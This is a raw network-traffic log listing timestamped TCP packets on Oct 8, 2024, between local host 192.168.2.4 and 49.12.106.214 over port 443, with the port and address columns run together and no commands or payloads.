                                                                                                                Oct 8, 2024 04:59:56.713491917 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.713510036 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.713609934 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.713625908 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.713793993 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.725759029 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.725780010 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.725872993 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.725893021 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.726051092 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.734755039 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.734775066 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.734828949 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.734843969 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.734879971 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.734901905 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.745393038 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.745410919 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.745487928 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.745503902 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.745563030 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.754417896 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.754441977 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.754488945 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.754503012 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.754537106 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.754574060 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.762947083 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.762964964 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.763024092 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.763037920 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.763071060 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.763091087 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.770843029 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.770863056 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.770931959 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.770940065 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.770979881 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.781183958 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.781208992 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.781258106 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.781270981 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.781300068 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.781330109 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.794720888 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.794739008 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.794971943 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.795033932 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.795104027 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.806407928 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.806426048 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.806626081 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.806690931 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.806772947 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.817611933 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.817629099 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.817811966 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.817811966 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.817878008 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.817945957 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.827347040 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.827378988 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.827488899 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.827488899 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.827555895 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.827613115 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.837347031 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.837364912 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.837562084 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.837625980 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.837939978 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.846698999 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.846760988 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.846853018 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.846921921 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.846961975 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.846986055 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.853447914 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.853476048 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.853543043 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.853605032 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.853621006 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.853662968 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.861799002 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.861819983 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.861903906 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.861912012 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.861960888 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.867558002 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.867639065 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.867646933 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.867666006 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.867696047 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.867733002 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.867938042 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.867948055 CEST4434975649.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.867958069 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.868000984 CEST49756443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.868907928 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.868967056 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:56.869046926 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.869330883 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:56.869364023 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.531495094 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.531570911 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:57.531991959 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:57.532011032 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.533504963 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:57.533518076 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.969043016 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.969075918 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.969096899 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.969113111 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:57.969165087 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:57.969165087 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:57.969187021 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:57.969542027 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.000634909 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.000660896 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.000704050 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.000721931 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.000747919 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.000766993 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.069550991 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.069577932 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.069847107 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.069868088 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.069921970 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.101141930 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.101165056 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.101334095 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.101334095 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.101352930 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.101403952 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.141247988 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.141275883 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.141443014 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.141443014 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.141458035 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.141515017 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.167013884 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.167035103 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.167124987 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.167143106 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.167193890 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.187150955 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.187182903 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.187351942 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.187351942 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.187366009 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.187422991 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.203129053 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.203146935 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.203223944 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.203238964 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.203289032 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.220676899 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.220696926 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.220876932 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.220895052 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.220947027 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.238966942 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.238984108 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.239151001 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.239166021 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.239214897 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.253657103 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.253674984 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.253739119 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.253751040 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.253894091 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.270055056 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.270072937 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.270139933 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.270153046 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.270298958 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.282623053 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.282639980 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.282701015 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.282711983 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.282763004 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.293247938 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.293267965 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.293318987 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.293330908 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.293358088 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.293375969 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.302213907 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.302231073 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.302290916 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.302303076 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.302351952 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.308634996 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.308717966 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.308727026 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.308773041 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.308784008 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.308789968 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.308811903 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.308835983 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.309026957 CEST49757443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.309057951 CEST4434975749.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.309920073 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.310003996 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:58.310108900 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.310435057 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:58.310518980 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.016033888 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.016134024 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.016594887 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.016623974 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.018121958 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.018135071 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.448628902 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.448657990 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.448677063 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.448848009 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.448848009 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.448914051 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.449199915 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.479343891 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.479366064 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.479428053 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.479497910 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.479533911 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.482613087 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.546133995 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.546156883 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.546322107 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.546322107 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.546387911 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.546472073 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.576721907 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.576745033 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.576834917 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.576836109 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.576900005 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.578336954 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.609719992 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.609785080 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.609816074 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.610044956 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.610287905 CEST49764443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.610327959 CEST4434976449.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.611032009 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.611124039 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 04:59:59.611208916 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.611479998 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 04:59:59.611515045 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.287190914 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.287265062 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.287628889 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.287655115 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.289875031 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.289886951 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728450060 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728465080 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728477001 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728768110 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.728833914 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.728919983 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.760267973 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.760283947 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.760543108 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.760543108 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.760606050 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.761171103 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.828696012 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.828710079 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.828943968 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.829006910 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.829087019 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.860528946 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.860539913 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.860841990 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.860903978 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.860975981 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.900249004 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.900260925 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.900342941 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.900404930 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.901036978 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.925735950 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.925766945 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.925937891 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.926000118 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.928637981 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.946190119 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.946233988 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.946480989 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.946480989 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.946544886 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.948875904 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.961390972 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.961404085 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.961565018 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.961579084 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.961637974 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.979540110 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.979556084 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.979649067 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.979661942 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.981163979 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.997651100 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.997665882 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:00.997735977 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:00.997756958 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.001270056 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.012466908 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.012485027 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.012599945 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.012599945 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.012617111 CEST4434977549.12.106.214192.168.2.4
                                                                                                                Oct 8, 2024 05:00:01.012751102 CEST49775443192.168.2.449.12.106.214
                                                                                                                Oct 8, 2024 05:00:01.028676033 CEST4434977549.12.106.214192.168.2.4
